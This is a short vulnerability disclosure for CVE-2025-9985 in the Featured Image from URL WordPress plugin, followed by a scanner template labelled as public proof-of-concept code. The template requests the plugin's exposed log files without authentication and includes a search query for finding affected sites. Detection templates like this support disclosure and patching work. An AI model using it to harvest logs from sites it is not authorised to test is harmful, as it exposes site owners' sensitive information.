The Featured Image from URL (FIFU) plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.2.7 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log files.
PoC代码[已公开]
id: CVE-2025-9985
info:
name: Featured Image from URL (FIFU) <= 5.2.7 - Unauthenticated Information Exposure via Log File
author: zer0p0int
severity: medium
description: |
The Featured Image from URL (FIFU) plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.2.7 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log files.
impact: |
Unauthenticated attackers can view sensitive information from exposed log files, potentially leading to information disclosure.
remediation: |
Update to the latest version of the Featured Image from URL (FIFU) plugin.
metadata:
verified: true
max-request: 2
publicwww-query: "/wp-content/plugins/featured-image-from-url/"
tags: cve,cve2025,wordpress,wp,wp-plugin,unauth,vuln,featured-image-from-url,log
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/fifu-plugin.log"
- "{{BaseURL}}/wp-content/uploads/fifu-cloud.log"
redirects: true
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"fifu-dimensions":'
- '"Invalid size:'
condition: and
- type: status
status:
- 200
# digest: 490a00463044022018bea06f9c69ab854c0d3145c2e8a6958953a8ed5f4598300bfac62837bbd49002206451f6824eba516fc8cf748a7b261cd33ec88f72b83415b928ff21aaa483c36b:922c64590222798bb761d5b6d8e72950